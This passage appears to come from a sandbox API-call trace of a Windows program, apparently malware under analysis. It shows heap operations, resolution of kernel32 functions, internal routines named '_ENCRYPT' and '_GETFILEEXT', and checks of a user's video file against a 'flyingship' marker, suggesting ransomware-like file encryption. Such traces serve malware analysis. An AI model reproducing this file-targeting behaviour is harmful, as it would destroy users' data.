lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0199.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0199.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0199.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.574] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0199.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0199.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0199.575] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0199.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0199.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0199.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0199.575] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0199.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0199.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0199.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0199.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.576] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0199.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0199.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd8e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0199.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.576] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0199.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0199.577] CloseHandle (hObject=0x160) returned 1 [0199.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0199.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0199.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0199.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0199.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.577] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0199.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.578] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0199.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.578] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.578] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0199.578] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.578] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0199.578] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0199.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.578] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.578] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.578] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.578] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f0b07b0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x6c66c1b0, ftLastAccessTime.dwHighDateTime=0x1d5e6cf, ftLastWriteTime.dwLowDateTime=0x6c66c1b0, ftLastWriteTime.dwHighDateTime=0x1d5e6cf, nFileSizeHigh=0x0, nFileSizeLow=0x4606, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="J9c7.avi", cAlternateFileName="")) returned 0x90add8 [0199.579] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.579] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.579] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f0b07b0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x6c66c1b0, ftLastAccessTime.dwHighDateTime=0x1d5e6cf, ftLastWriteTime.dwLowDateTime=0x6c66c1b0, ftLastWriteTime.dwHighDateTime=0x1d5e6cf, nFileSizeHigh=0x0, nFileSizeLow=0x4606, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="J9c7.avi", cAlternateFileName="")) returned 0x90add8 [0199.579] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.579] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="58zBpaZzgTTH\\J9c7.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 